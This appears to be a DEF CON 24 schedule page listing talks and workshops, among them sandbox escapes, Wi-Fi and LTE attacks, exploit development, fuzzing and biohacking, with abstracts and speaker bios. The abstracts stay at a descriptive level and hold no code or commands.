Rodrigo is a professor at Federal University of Itajubá. He has 9 years working with embedded systems, developing projects both in home and electro-medical appliances. He actually teaches classes on electronics, microcontrollerers and embedded operational systems to electronic engineering students. His researches include topics on hardware development, RTOS security and embedded systems usability. Rodrigo has presented on DEF CON, ESC and BSides conferences, mostly talking about embedded development and related security issues.
Max Class Size: 40
Prerequisites for students:Basic/Intermediate C programming knowledge
Materials or Equipment students will need to bring to participate: Just laptops. The electronic material will be provided by me to everyone.
Return to Index
Demolabs - Table 6 - Saturday - 12:00-13:50
Emo-Tool/OldYeller/Ransomware-Simulator
Weston Hecker
Emo and Old Yeller are tools that make your computer Immune to 26 different variants of Ransomware including SAMSAM Locky Cryptowall and Cryptolocker. these tools use sandbox evasion methods built into the malware against its self "Emo makes malware kill itself Oldyeller makes you crash your own system upon infection."
11 years pen-testing, Security Research, Programming. Speaker at Defcon 22, 23 and 24 Las Vegas, HOPE 11, TakedownCON 2016,B-sides Boston, Blackhat 2016, Enterprise Connect 2016, ISC2, SC Congress Toronto. worked on several opensource tools. Including Skimbad Anti-CC-Fraud Platform,Opencodec, Hacker tools such as "CompanyBAN" a AD automated company wide lock out tool. Several SDR tools, Reversing Engineering of Malware. Telephone DDOS tools. Open-CV. Hardware includes ATM Shimmers Anti-Skimmers, Gaspump (Anti)Skimmers and OldyellerUSB.
Return to Index
DEFCON - DEF CON 101 - Saturday - 10:00-10:59
Escaping The Sandbox By Not Breaking It
Marco Grassi KEENLAB of Tencent
Qidan He KEENLAB of Tencent
The main topic of this technical talk will be "sandboxes" and how to escape them. One of the main component of the modern operating systems security is their sandbox implementation. Android for example in recent versions added SELinux to their existing sandbox mechanism, to add an additional layer of security. As well OS X recently added System Integrity Protection as a ‘system level’ sandbox, in addition to the regular sandbox which is ‘per-process’.
All modern OS focus on defense in depth, so an attacker and a defender must know these mechanisms, to bypass them or make them more secure. We will focus on Android and iOS/OSX to show the audience the implementations of the sandbox in these operating systems, the attack surface from within interesting sandboxes, like the browser, or applications sandbox.
Then we will discuss how to attack them and escape from our restricted context to compromise further the system, showcasing vulnerabilities. We think that comparing Android with iOS/OSX can be very interesting since their implementation is different, but the goal for attackers and defenders is the same, so having knowledge of different sandboxes is very insightful to highlight the limitations of a particular implementation. The sandboxes some years ago were related mainly to our desktop, mobile phone or tablet. But if we look now at the technology trend, with Automotive and IOT, we can understand that sandboxes will be crucial in all those technologies, since they will run on mainstream operating system when they will become more popular.
Marco Grassi is currently a Senior Security Researcher of the KEEN Lab of Tencent (previously known as KEEN Team). He was one of the main contributors at Pwn2Own 2016 for the Safari target with sandbox escape to root. He is a member of the team who won the title of ‘Master Of Pwn’ at Pwn2Own 2016. Formerly he was a member of NowSecure R&D Team, where he researched solutions for mobile security products and performed reverse engineering, pentesting and vulnerability research in mobile OS applications and devices. When he’s not poking around mobile devices, he enjoys developing embedded and electronic systems. He has spoken at several international security conferences such as ZeroNights, Black Hat, Codegate, HITB and cansecwest.
Twitter: @marcograss
Qidan He (a.k.a Edward Flanker) is a security researcher focusing on mobile security at KeenLab of Tencent (former known as Keen Team). His major experience includes Android/iOS/OSX security and program analysis. He has reported several vulnerabilities in Android system core components, which were confirmed and credited in multiple advisories. He has also found multiple vulnerabilities in OSX kernel, which are awaiting patch and credit. He is the winner of Pwn2Own 2016 OSX Category and member of Master of Pwn Champion team. He has spoken at conferences like Blackhat, CanSecWest, HITCON and QCON.
Twitter: @flanker_hqd
Return to Index
DEFCON - DEF CON 101 - Saturday - 16:30-16:59
Esoteric Exfiltration
WIlla Cassandra Riggins(abyssknight) Penetration Tester, Veracode
When the machines rise up and take away our freedom to communicate we're going to need a way out. Exfiltration of data across trust boundaries will be our only means of communication. How do we do that when the infrastructure we built to defend ourselves is the very boundary we must defeat? We use the same pathways we used to, but bend the rules to meet our needs. Whether its breaking protocol, attaching payloads, or pirating the airwaves we'll find a way. We'll cover using a custom server application to accept 'benign' traffic, using social and file sharing to hide messages, as well as demo some long range mesh RF hardware you can drop at a target for maximum covert ops.
Willa Cassandra Riggins is a penetration tester at Veracode, and was previously part of the Lockheed Martin CIS Red Team. She started her career as a developer and pivoted into security to help fight the pandemic that is developer apathy. Her background spans the software development lifecycle, but her heart is in root shells and crown jewels. She can be found making things at FamiLAB in Orlando, hacking at the local DC407 meet-ups, staffing the socials at BSides Orlando, and marketing all the things at OWASP Orlando.
Twitter: @willasaywhat
dcg
Return to Index
BHV - Skyview 4 - Saturday - 13:30-13:59
Speaker: John Sundman
@jsundmanus
johnsundman.com
About John Sundman:
John Sundman has been writing about hacking in general and biohacking in particular, in both fiction and nonfiction genres, for twenty years. His 1999 novel Acts of the Apostles anticipated many of the developments we're seeing today.
Of Sundman's novels, the legendary synthetic biologist George Church said,
"Sundman is a master of machines —computing, biological and political — and his books include details that will convince an expert, and yet enchant a distant outsider with a compelling page-turner plot. Not just plot and mechanisms, but unforgettable personalities that haunt us long after the pages stop."
A 1+ hour conversation between me & Church can be found here.
Abstract:
The convergence of biological and digital technologies is one of the most significant aspects of the world we inhabit -- perhaps *the* most significant, since from this convergence we can plausibly extrapolate to near futures featuring everything from the elimination of poverty, want and death to the end of life on earth. This trend has been evident for a while, but CRISPR puts it in our faces.
Unlike, say, nuclear technology, biodigital technology is inherently democratic. We are in a biohacking maker world, and we're not going back.
The positive uses for these technologies are limitless, and many of them easy to imagine. The dangers are a little less obvious, but many of them can be anticipated, and there are certain to be unanticipated dangers as well. The potential for societal disruption, among others, has been widely underestimated.
What ethical responsibilities do biohackers and scientists bear? And do artists and intellectuals, writers in particular, have an obligation to take on these subjects, maybe even provide some guidance?
Return to Index
Wireless - Skyview 1 - Saturday - 11:00-11:50
Matt Trimble (dEM)
Bio
"Matt Trimble is the Global Cyber Security Team Manager for Barracuda Networks. Matt's duties include Barracuda Networks' product security testing, Bug Bounty, Red Team, and CIRT. Matt spends most of his time leading his team of miscreants in trying to make the Internet a safer place for its denizens.
When Matt isn't putting out the latest Internet fire, he enjoys spending time with his wife and four kids. He enjoys hiking, jogging, and biking. Matt also enjoys hacking challenges. In 2015, Matt was on the team that won the DefCon Wireless CTF."
Eric Escobar (JusticeBeaver)
Bio
Eric Escobar is a Security Engineer at Barracuda Networks. His interests are broad and generally include putting computers in places you wouldn't expect. From chicken coops to rockets and even bee hives. Before being called to the dark side, Eric procured a Bachelor's and Master's degree in Civil Engineering. He now enjoys all things wireless, from WiFi, to SDR, and Ham Radio. Last year his team placed 1st in DEF CON 23's Wireless CTF.
Evil ESP
Abstract
"This talk will be on using the ESP8266 (ESP) Wifi module for nefariously awesome purposes. We intended to perform live demonstrations of the ESP in action and demonstrate how easy it can be to program (once you know how). The goal is to show how game changing a disposable (less than $3) WiFi device with extremely low power draw can be for the security community.
The talk will begin with an overview of what the ESP is, how to program it, and some history about the device. We will touch on our trials and tribulations in translating the documentation and how, to a large extent, this is no longer needed.
We will demonstrate using the ESP as a quick and dirty WiFi jamming device using both AP BSSID cloning and de-auth injection. A note will be made that this should only be done for research purposes as they may be considered radio jamming by the FCC, and thus illegal. We will talk about why both troubleshooting what is occurring and finding the device responsible for the attack are difficult. We will show demonstration of an ESP based de-auth-o-matic.
We will then build on the previous topics and discuss the ESPs use as a disposable Evil Twin. We will demonstrate using the ESP as an evil AP in a fictitious attack in a residential setting.
We will show how combining an ESP with other low cost IoT devices like the HopeRF transceiver can drastically increase the breadth of its capabilities. We will demonstrate a remote controlled de-auth device and how this decreases the risk to someone cracking a WiFi network.
We will close with a discussion that builds on the previous topics. We will discuss using the ESP as a disposable node in a low cost mass surveillance mesh network.
We will end with a Q\&A session."
Detecting and Finding Rogue Access Points
Abstract
"Rogue access points are a security concern for businesses, individuals, and muggles alike. The ability to detect and find a rogue access point is an invaluable skill to add to your hacker utility belt. This presentation will discuss how to detect rogue access points (APs) and what to do once you've detected one. We'll discuss inexpensive tools to add to your bag (once the Amazon drone has delivered them), including types of antennas, network adapters and some other odds and ends to round out your toolbox.
Once weve covered some the basics and outfitted your bag well chat about techniques you can use to find that rogue AP, whether that be wardriving your neighborhood, or suiting up your pet with tech. This talk will cover tactics weve used to Find the Fox at the past couple of wireless capture the flag competitions, and even how to create a pretty heat map of wireless access points in your neighborhood. Well talk about tactics weve used in the field and all the ways weve messed it up. "
|
Return to Index
DEFCON - Track Three - Sunday - 10:00-10:59
Examining the Internet's pollution
Karyn Benson Graduate Student
Network telescopes are collections of unused but BGP-announced IP addresses. They collect the pollution of the Internet: scanning, misconfigurations, backscatter from DoS attacks, bugs, etc. For example, several historical studies used network telescopes to examine worm outbreaks.
In this talk I will discuss phenomena that have recently induced many sources to send traffic to network telescopes. By examining this pollution we find a wealth of security-related data. Specifically, I'll touch on scanning trends, DoS attacks that leverage open DNS resolvers to overwhelm authoritative name servers, BitTorrent index poisoning attacks (which targeted torrents with China in their name), a byte order bug in Qihoo 360 (while updating, this security software sent acknowledgements to wrong IP addresses... for 5 years), and the consequence of an error in Sality's distributed hash table.
Karyn recently defended her PhD in computer science. Prior to starting graduate school she wrote intrusion detection software for the US Army. When not looking at packets, Karb eats tacos, runs marathons, and collects state quarters.
Return to Index
Workshops - Las Vegas Ballroom 4 - Friday - 10:00-14:00
Exploit Development for Beginners
Sam Bowne Professor, City College San Francisco
Dylan James Smith
This workshop helps participants move beyond using attacks others have developed to understanding how programs work at the binary level and how to exploit their weaknesses. With these techniques, you can find new vulnerabilities and write proof-of-concept attack code, compete in cyber competitions, or earn bug bounties.
All materials, projects, and challenges are freely available at samsclass.info.
Sam Bowne has been teaching computer networking and security classes at City College San Francisco since 2000. He has given talks and hands-on trainings at DEF CON, HOPE, B-Sides SF, B-Sides LV, and many other cons. He has a PhD and a CISSP and a lot of T-shirts.
Dylan James Smith assisted Sam Bowne with hands-on workshops last year at DEF CON and B-Sides LV. He's a Mac guru and skilled at fixing PC's, Linux problems, and network problems too.
Max Class Size: 55
Prerequisites for students: Familiarity with C, Python, and assembly code is helpful but not required.
Materials or Equipment students will need to bring to participate: Participants need a computer with Kali Linux running, either in a virtual machine or locally. I will have a few loaner computers for students who don't have a usable computer.
Return to Index
IOT - Bronze 4 - Friday - 10:10-10:59
Exploiting a Smart Fridge: a Case Study in Kinetic Cyber
Kevin Cooper
Networked smart appliances can reduce energy costs and provide detailed situational awareness. However, the same remote access used for benevolent command and control can be leveraged by an adversary for reconnaissance and to cause real world kinetic effects if security is compromised. In this talk, we exploit a commercially available smart fridge to evaluate its sensor capabilities and to demonstrate the potential for delivering kinetic cyber effects. As a proof of concept, we use the fridge ambient humidity sensor to reveal its geographic location and nearby human activity. We also quantify the potential for intentional flooding. Finally, the fridge compartments are heated by abusing the compressor and defrosters to evaluate the potential for damaging temperature-sensitive medical supplies. We demonstrate that within two hours the refrigeration compartment and freezer can be raised above 30 C (86 F) and 20 C (68F), respectively, remotely via the Internet.
We highlight the interesting things that an attacker can do with network access to a smart fridge. How hot can the fridge get when the attacker turns off cooling and blasts the defrosters? How much water per hour can be released out of the fridge door? We answer these questions and more. We also show that the fridge ambient humidity sensor is sensitive enough to tell whether or not it is raining outside, which reveals geographic location. Hell, we will even give away hardware to the crowd.
Kevin Cooper is a computer scientist with a passion for network security. He frequently competes in CTF exercises and has extensive experience with reverse engineering, digital forensics, and network penetration testing.
Coauthor: Ben Ramsey, PhD, CISSP, has been building and breaking networks for over a decade. He specializes in embedded system security and low-rate wireless protocols, such as ZigBee, Z-Wave, and Bluetooth Low Energy. He has published in academic journals and presented his research at multiple conferences, including GLOBECOM, MILCOM, SenseApp, and ShmooCon.
Return to Index
DEFCON - Track Three - Saturday - 15:00-15:59
Exploiting and Attacking Seismological Networks... Remotely
Bertin Bervis Bonilla Founder, NETDB.IO
James Jara Founder & CTO, NETDB.IO
In this presentation we are going to explain and demonstrate step by step in a real attack scenario how a remote attacker could elevate privileges in order to take control remotely in a production seismological network located at 183mts under the sea. We found several seismographs in production connected to the public internet providing graphs and data to anyone who connects to the embed web server running at port 80. The seismographs provide real time data based in the perturbations from earth and surroundings, we consider this as a critical infrastructure and is clear the lack of protection and implementation by the technicians in charge.
We are going to present 3 ways to exploit the seismograph which is segmented in 3 parts: Modem (GSM, Wi-Fi, Satellite, GPS,Com serial) {web server running at port 80 , ssh daemon} Sensor (Device collecting the data from ground or ocean bottom) Battery (1 year lifetime) Apollo server (MAIN acquisition core server) These vulnerabilities affect the Modem which is directly connected to the sensor , a remote connection to the modem it's all that you need to compromise the whole seismograph network. After got the root shell our goal is execute a post exploitation attack , This specific attack corrupts/modifies the whole seismological research data of a country/ area in real time. We are going to propose recommendations and best practices based on how to deploy a seismological network in order to avoid this nasty attacks.
Bertin Bervis Bonilla is a security researcher focused in offensive security, reverse engineering and network attacks and defense, Bertin has been speaker in several security conferences in his country and latin america such OWASP Latin Tour , DragonJAR conference and EKOPARTY, He is the founder of NetDB - The Network Database project , a computer fingerprint/certificate driven search engine. Formerly is a network engineer working for a five letters us networking company in San Jose Costa Rica.
Twitter: @bertinjoseb
James Jara is the founder and CTO of NETDB.IO , a search engine of internet of things focused in info-security research. He likes Bitcoin Industry, Open Source and framework development and gave various presentations on security conferences like EkoParty. Interested machine learning for mobile, Internet of Things (IoT) devices and industrial systems used in critical infrastructure networks. Sport-coder!
Return to Index
BHV - Skyview 4 - Friday - 10:30-10:59
Speaker: Amal Graafstra
@amal
dangerousthings.com
About Amal:
Adventure technologist and biohacker Amal Graafstra has always been interested in technology. In 2005 he became the world’s first double RFID implantee. Amal had two small RFID transponders implanted, one into each hand, and he still uses them to open doors, start his vehicles, and log into his computer. Since implanting himself, he’s written a book called RFID Toys, become a TEDx speaker, appeared on a multitude of television programs, and been the subject of various documentaries. He's also started a biohacking company called Dangerous Things which developed the world’s first and only NFC compliant implantable transponder. He continues to explore biohacking and transhumanism while developing next generation implantable technologies.
Abstract:
Amal covers the rise of biohacking, implantables, and the future of biohacking.
Return to Index
IOT - Bronze 4 - Friday - 12:10-12:59
The FCCs Cybersecurity Risk Reduction Initiatives and Activities
Rear Admiral (ret.) David Simpson, FCC, Bureau Chief
The consumer benefits of the IoT are anticipated to be exceedingly large with 5G wireless technologies underpinning much of the evolving IoT landscape. However, IoT will also greatly expand the cyber attack surface for consumer appliances. This session will discuss the FCCs initiatives to better posture the telecommunications sector to combat cyber threats to the communications critical infrastructure and solicit attendee participation in developing appropriate FCC policy objectives for 5G.
This is not a typical government monologue; this talk is an interactive, engaging, informative discussion of the FCCs cybersecurity risk reduction initiatives to combat the most pressing threats to the communications critical infrastructure that would undermine the integrity and deployment of the IoT. It will explain the unique vulnerabilities inherent in 5G and explore opportunities to design 5G in a manner that reduces risk for the IoT.
Rear Admiral (ret.) David Simpson was appointed Chief of the FCCs Public Safety and Homeland Security Bureau in November 2013. He brings to this role more than 20 years of ICT experience supporting the DoD, working closely with other agencies to provide secure communication services and improve cyber defense readiness. Simpson is a native of Burbank, CA and a 1982 graduate of the United States Naval Academy. He earned a master's degree in systems technology from the Naval Postgraduate School.
Return to Index
DEFCON - Track One - Friday - 10:00-10:59
Feds and 0Days: From Before Heartbleed to After FBI-Apple
Jay Healey Senior Research Scholar, Columbia University
Does the FBI have to tell Apple of the vuln it used to break their iPhone? How many 0days every year go into the NSA arsenal -- dozens, hundreds or thousands? Are there any grown-ups in Washington DC watching over FBI or NSA as they decide what vulns to disclose to vendors and which to keep to themselves? These are all key questions which have dominated so much of 2016, yet there's been relatively little reliable information for us to go on, to learn what the Feds are up to and whether it passes any definition of reasonableness.
Based on open-source research and interviews with many of the principal participants, this talk starts with the pre-history starting in the 1990s before examining the current process and players (as it turns out, NSA prefers to discover their own vulns, CIA prefers to buy). The current process is run from the White House with "a bias to disclose" driven by a decision by the President (in because of the Snowden revelations). The entire process was made public when NSA was forced to deny media reports that it had prior knowledge of Heartbleed.
Jason Healy is a Senior Research Scholar at Columbia University's School for International and Public Affairs. During his time in the White House, he coordinated efforts to secure the Internet and US critical infrastructure. He started his career as a US Air Force intelligence officer where he helped create the first joint cyber command, in 1998 and is a Senior Fellow at the Atlantic Council.
Twitter: @Jason_Healey
Return to Index
WOS - Skyview 6 - Saturday - 18:10-18:59
Fiddler on the Roof: A No-Nonsense Look at Fiddler and Its Usage
Morgan "Indrora" Gangwere
Fiddler lives in the same family as mitmproxy, Burp, and other "man in the middle" tools. Topics covered in this talk include: scripting the Fiddler proxy, making arbitrary requests, redirection and attacking Windows 8 and UAP applications.
Morgan "Indrora" Gangwere (Twitter: @indrora) is a student at the University of New Mexico. He breaks things for fun when not studying.
Return to Index
SkyTalks - Skyview 3 - Friday - 14:00-14:59
Speaker Marcelo Mansur
Talk: Financial Crime: Past, Present, and Future
Starting with my own experience working in what turned out to be a boiler room investment brokerage, this talk will cover how financial crime has changed over the past 20 years and how black hat hackers and cryptocurrency are the new weapons of white collar fraudsters.
Return to Index
BHV - Skyview 4 - Friday - 12:30-12:59
Speaker: Alan
About Alan:
Alan is an award winning serial biotech entrepreneur and is currently CEO of MiraculeX, an early stage company developing the first great tasting & healthy consumer sweeteners. He has had 10 years of experience working in both academia and industry on medical devices & protein engineering. Alan graduated from NYU School of Engineering with a dual M.S in biotechnology and entrepreneurship. He is an Alum of NYU Launchpad, Elab NYC and Harlem biospace and IndieBio.
Abstract:
By combining hydroponics with the newest plant genetic engineering technologies, we are creating a new paradigm for production of healthy sweeteners at affordable costs. Our ultimate vision is create a future where everyone can finally enjoy the foods they crave, without worry.
Return to Index
DEFCON - Track One - Saturday - 15:00-15:59
Forcing a Targeted LTE Cellphone into an Unsafe Network
Haoqi Shan Hardware/Wireless security researcher, Qihoo 360
Wanqiao Zhang Communication security researcher, Qihoo 360
LTE is a more advanced mobile network but not absolutely secure. Recently there already some papers those exposed the vulnerabilities of LTE network. In this presentation, we will introduce one method which jointly exploits the vulnerabilities in tracking area update procedure, attach procedure, and RRC redirection procedure, and finally can force a targeted LTE cellphone to downgrade into a malicious GSM network, then consequently can eavesdrop its data traffic or even voice call. This attack is not a simple DoS attack. It can select the targeted cellphone by filtering the IMSI number (IMSI catcher function), so it will not influence the other cellphones and keep them still in the real network. Further more, it can force the cellphone into the malicious network that we setup (a fake network) or we assign (operator’s network), therefore the cellphone has no chance to choose other secure network. This is the danger point of this attack.
Haiqi Shan, currently a wireless/hardware security researcher in Unicorn Team. He focuses on GSM system, router/switcher hacking etc. Other research interests include reverse engineering on embedded devices such as femto-cell base station. He has gave presentations about GSM devices hacking and wireless hacking suit on DEF CON, Cansecwest, Syscan
Wanqiao Zhang, is a communication security researcher, from Unicorn Team of Qihoo 360 China. She received her master degree in electronic information engineering form Nanjing University of Aeronautics and Astronautics in 2015. Fascinated by the world of wireless security, she is currently focus on the security research of the GPS system and the cellular network
Return to Index
SkyTalks - Skyview 3 - Sunday - 11:00-11:59
Speaker: obiwan666
Talk: Front Door Nightmare
I will present a closer lock onto electro-mechanic door locks. We will learn, how these locks are working in general and the different technics used by different vendors. After the overview, we will dig deeper into the details of the locks and look how they are working. Now, after we learned how it works, we will open one with RFID transponder and fake a medium. But wait. This is to easy. Many others have done this before. I will show, how to open the locks without a valid RFID Transponder, why this is possible and where the needed tools could be found. The audience will learn, where to look for good and bad locks. A sample of a secure design and how to identify will be shown. Long Description: The problem of those electromechanical locks are mostly in the design of the lock. I am looking for the interface of the pcb (the RFID part) to the locking mechanik. Many vendors designing the locks in a wrong way. Most attacks could be done with the batterie change equipment and a closer look whats in there. Its so easy, when you know where to look and how to identify a bad design. On the other hand, there are also good vendors with a very secure hardware design. The RFID problems i will not discuss, only a short overview.
Return to Index
DEFCON - Track One - Friday - 12:30-12:59
Frontrunning the Frontrunners
Dr. Paul VixieCEO and Co-founder, Farsight Security, Inc.
-While some domainers allegedly brainstorm ideas for new domains to register while taking a shower, the more successful domain portfolio managers, working at scale, are believed to be ‘data driven.’ DNS queries are a material source of intelligence about domainer opportunities and operations, and also help us to understand the operational constraints around potentially combating domainers, should we want to do so. In this presentation co-authored with Farsight Security Scientist Dr. Joe St Sauver, Farsight Security CEO Dr. Paul Vixie will scrutinize failed DNS queries (‘NXDOMAINs’), looking for the same ‘opportunities’ that a domainer or typo squatter would (although we will not be acting on that data by actually registering domains).
Dr. Vixie will discuss two primary types of behavior: 1) Volumetrically-driven typo-squatting, which Dr. Vixie will measure by computing the volume of NXDOMAINs seen by domain during a 24 hour period, and the time between popular typos appearing in NXDOMAINs and those same domains being registered and actually used, and 2) Domainers programmatically exploring permutations of domains around high value domains, probing for available domains and automatically registering the most promising probed domains discovered to still be available. Both of these hypothesized behaviors should be externally observable and thus able to be confirmed by watching a real-time stream of NXDOMAIN errors, and a real-time stream of newly observed, actually-registered domains, as available from the Security Information Exchange.
Dr. Paul Vixie will experimentally confirm these hypothesized relationships and describe examples of (1) the most commonly observed types of typographical errors, (2) the brands apparently most-targeted for squatting, (3) the distribution of delays from NXDOMAIN detection to observed domain use, (4) the potential relationship between NXDOMAIN volume thresholds and TLD cost. Dr. Vixie will also explain how this information illuminates opportunities for tackling these types of domain name abuse. Time will be reserved for Q&A.
Dr. Paul Vixie is the CEO and Co-founder of Farsight Security. He previously served as President, Chairman and Founder of Internet Systems Consortium (ISC), as President of MAPS, PAIX and MIBH, as CTO of Abovenet/MFN, and on the boards of several for-profit and non-profit companies. He served on the ARIN Board of Trustees from 2005 to 2013, as ARIN Chairman in 2008 and 2009, and was a founding member of ICANN Root Server System Advisory Committee (RSSAC) and ICANN Security and Stability Advisory Committee (SSAC). He operated the ISC's F-Root name server for many years, and is a member of Cogent's C-Root team. He is a sysadmin for Op-Sec-Trust. Dr. Vixie has been contributing to Internet protocols and UNIX systems as a protocol designer and software architect since 1980. He wrote Cron (for BSD and Linux), and is considered the primary author and technical architect of BIND 4.9 and BIND 8, and he hired many of the people who wrote BIND 9. He has authored or co-authored a dozen or so RFCs, mostly on DNS and related topics, and of Sendmail: Theory and Practice (Digital Press, 1994). His technical contributions include DNS Response Rate Limiting (RRL), DNS Response Policy Zones (RPZ), and Network Telemetry Capture (NCAP). He earned his Ph.D. from Keio University for work related to DNS and DNSSEC, and was named to the Internet Hall of Fame in 2014.
Twitter: @paulvixie
LinkedIn
Return to Index
BHV - Skyview 4 - Friday - 10:00-10:59
Speaker: Ryan O'Shea
About Ryan O'Shea:
Ryan O’Shea is a futurist, biohacker, and television personality based in Pittsburgh, Pennsylvania. He is the creator and host of the acclaimed futurism, science, and technology themed podcast Future Grind and currently serves as the spokesman and advisor of Grindhouse Wetware, a biotechnology startup company that creates technology to augment human capabilities. He's worked as a producer and consultant on numerous film and television projects related to biohacking and currently represents the Jet Propulsion Laboratory as a Solar System Ambassador, a program operated by the California Institute of Technology for NASA.
Abstract:
Biohacking is moving from niche science fiction to popular culture, the human body is now a part of the Internet of Things, and finger magnet and RFID implants are gaining traction. But this is just the beginning. Futurist podcast host and Grindhouse Wetware spokesman Ryan O'Shea lays out the potential future of human augmentation and explains how this type of directed evolution is really just an extension of what humans have already been doing for generations.
Return to Index
Workshops - Las Vegas Ballroom 5 - Saturday - 14:00-18:00
Fuzzing Android Devices
Anto Joseph Security Engineer, Intel
Droid-FF is the very first Android fuzzing framework which helps researchers find memory corruption bugs written in c /c ++ . In this workshop , all you need to start fuzzing mobile devices is presented as a VM which is ready to go and easy to work with. You will get hands on experience fuzzing real devices and finding bugs and tracing them back to source and triage them for exploitability.
Anto Joseph is a Security Engineer for Intel. He is enthusiastic about MobileSecurity and IOT .He is very passionate about research and is currently researching on Mobile Malware . He has developed custom tools and fuzzers for helping in PT's and Vulnerability Research .He has been speaker / trainer in various security conferences including BruCon, HackInParis, HITB Amsterdam , NullCon , GroundZero , c0c0n , XorConf etc and has good expertise in Practical Security.
Max Class Size: 55
Prerequisites for students: Familiar with Android / IOS eco-system
Materials or Equipment students will need to bring to participate: Good enough laptop to host two virtual machines in virtualbox.
Return to Index
WOS - Skyview 6 - Saturday - 16:10-16:59
Fuzzing For Humans: Real Fuzzing in the Real World
Joshua Pereyda
Fuzzing tools are frequently seen in big-name conferences, attached to big-name hacks and big-name hackers. Fuzzers are an incredibly useful offensive tool, and equally critical for a defensive player. But anyone who has tried to use these big-name fuzzers to secure their own software has seen how ineffective they can be. The fuzzing world is plagued with over-hyped and under-developed fuzzers that will suck the life out of anyone who dares try to sort through their waterlogged codebase. Meanwhile, commercial players stand by ready to support big businesses, but not open source. Commercial fuzzers may be good business, and their existence is a boon for the industry, but they are not sufficient for widespread security. They keep the power of fuzzing locked up for those willing to pay big bucks. And the closed source nature stamps out community, leaving each business to develop their own practices. In this talk, Joshua will provide a practical perspective on fuzzing, explore the hurdles confronting current open source tools and pave a path forward. Attendees will also receive an introduction to DIY fuzzers using modern frameworks.
Joshua Pereyda (Twitter: @jtpereyda) is a software engineer specializing in information and network security. He currently works in the critical infrastructure industry with employers heavily invested in software and hardware security. Among his passions are hacking, teaching kids to program, Netflix with his wife, and figuring out how he can get paid to do it all --legally.
Joshua is the maintainer of boofuzz, a fork of the renowned Sulley fuzzing framework. He has a hole in his heart to pour into the open source hacking community.
Return to Index
DEFCON - Track Three - Sunday - 12:00-12:59
Game over, man! – Reversing Video Games to Create an Unbeatable AI Player
Dan ‘AltF4’ Petro Security Associate, Bishop Fox
"Super Smash Bros: Melee." - Furrowed brows, pain in your thumbs, trash talk your Mom would blush to hear. That sweet rush of power you once knew as you beat all the kids on your block will be but a distant memory as SmashBot challenges you to a duel for your pride — live on stage. SmashBot is the Artificial Intelligence I created that plays the cult classic video game Smash Bros optimally. It can't be bargained with. It can't be reasoned with. It doesn't feel pity, remorse, or fear. This final boss won't stop until all your lives are gone.
What started as a fun coding project in response to a simple dare grew into an obsession that encompassed the wombo-combo of hacking disciplines including binary reverse engineering, AI research, and programming. When not used to create a killer doomsday machine, these same skills translate to hacking Internet of Things (IoT) devices, developing shellcode, and more. Forget about Internet ending zero-day releases and new exploit kits. Come on down and get wrecked at a beloved old video game. Line up and take your turn trying to beat the AI yourself, live on the projectors for everyone to see. When you lose though, don't run home and go crying to yo Momma.
Dan Petro is a Security Associate at Bishop Fox, a security consulting firm providing services to the Fortune 500, global financial institutions, and high-tech startups. In this role, he focuses on application and network penetration testing. He has presented at numerous conferences, including Black Hat USA, DEF CON , HOPE, BSides, and ToorCon. He has also been a featured guest speaker at Arizona State University, South Mountain Community College, and the Dark Reading University series. Dan has been quoted in various industry and mainstream publications such as Business Insider, Wired, The Guardian, and Mashable among others. He is widely known for the tools he has created: the Chromecast-hacking device, the RickMote ContRoller, and Untwister, a tool used for breaking pseudorandom number generators. He also organizes Root the Box, a capture the flag security competition. Additionally, Dan often appears on local and national news to discuss topical security issues. Dan holds a Master’s Degree in Computer Science from Arizona State University and doesn’t regret it.
Return to Index
CPV - Bronze 2 - Friday - 16:00-17:30
Talk Title:
Getting Started with Cryptography in Python [WORKSHOP]
Speaker Name, Employer or position:
Amirali Sanatinia - Northeastern University
Abstract:
Today we use cryptography in almost everywhere. From surfing the web over
https, to working remotely over ssh. However, many of us do not appreciate
the subtleties of crypto primitives, and the lack of correct and updated
resources leads to design and development of vulnerable applications. In
this talk, we cover the building block of modern crypto, and how to develop
secure applications in Python.
Bio:
Amirali Sanatinia is a Computer Science PhD candidate at Northeastern
University, and holds a Bachelors degree in CS from St Andrews University.
His research focuses on cyber security and privacy, and was covered by
venues such as MIT Technology Review and ACM Tech News. He is also the
OWASP Boston NEU Student chapter founder and leader.
Social media links if provided:
http://www.ccs.neu.edu/home/amirali
Return to Index
SkyTalks - Skyview 3 - Saturday - 11:00-11:59
Speaker: Cassiopiea
Talk: God is a Human II Artificial Intelligence and the Nature of Reality
Last year I presented the original, God is a Human: Artificial Intelligence in an Ethical Society. This year Im at it again, here to make you think about what you would really do if Artificial Intelligence became part of your world, only were going to focus more on something we only brushed over last year How are we going to hack AI?
I also want to talk about some other topics, including the FUD around AI. The movies and television would have you believe that you would know if AI were invading society, that armies of robots would march down the street and you would actually have something to fight, something to object to but in reality, its much more likely to come creeping quietly. Primitive and not-so-primitive AI is already here, in our games, in our phones, on our computers, in our homes. Did you even know that there is already a Campaign to Stop Killer Robots? How do you defend against something you hardly think about? And do you really need to?
Suggested reading: Isaac Asimovs I, Robot; Haselagers Robotics, philosophy, and the problems of autonomy, Do Androids Dream of Electric Sheep, Riedl and Harrisons Using Stories to Teach Human Values to Artificial Agents
Suggested viewing: Animatrix The Second Renaissance, 2001 A Space Odyssey, BladeRunner (Well, maybe just because its a highly entertaining film)
AI AKA DeleriumEndless has been a Professional Human Being concerned with the interaction of people with machines for longer than she cares to admit. She started programming computers as a hobby on a Commodore64, built her own computers and servers in the days of Win95 and on, and has been earning a wage in the IT field since 2007. Several times in there she went to school and took classes in philosophy, which led even further down the path of What happens if computers learn to think like people..? as well as computer sciences.
She has been observing machine/human interaction all that time, and has written some papers on human interaction in the field of security as well as some standard security blogs and observations on humanity and human interaction. She currently works for IBM as a security consultant and on the Watson project.
Return to Index
Demolabs - Table 3 - Saturday - 16:00-17:50
Graylog
Lennart Koopman
Graylog is a free and open source log management tool, aiming to be an affordable
alternative to many expensive commercial solutions.
Lennart Koopman is founder and original developer of Graylog. Before that he was a software architect a XING in Germany.
Return to Index
Workshops - Las Vegas Ballroom 1 - Saturday - 10:00-14:00
Guaranteed Security
Vivek Notani PhD Student University of Verona
Dr. Roberto Giacobazzi Senior Professor, University of Verona
Can you guarantee that the software you created does not contain any runtime errors or data races and would not be susceptible to buffer overflow or floating point errors? Can you create a program that can take any arbitrary program as an input and certify it as free from such errors or alert you of possible avenues of errors? Is such a thing even possible? Turns out, yes you can, or at least after this training you will be able to.
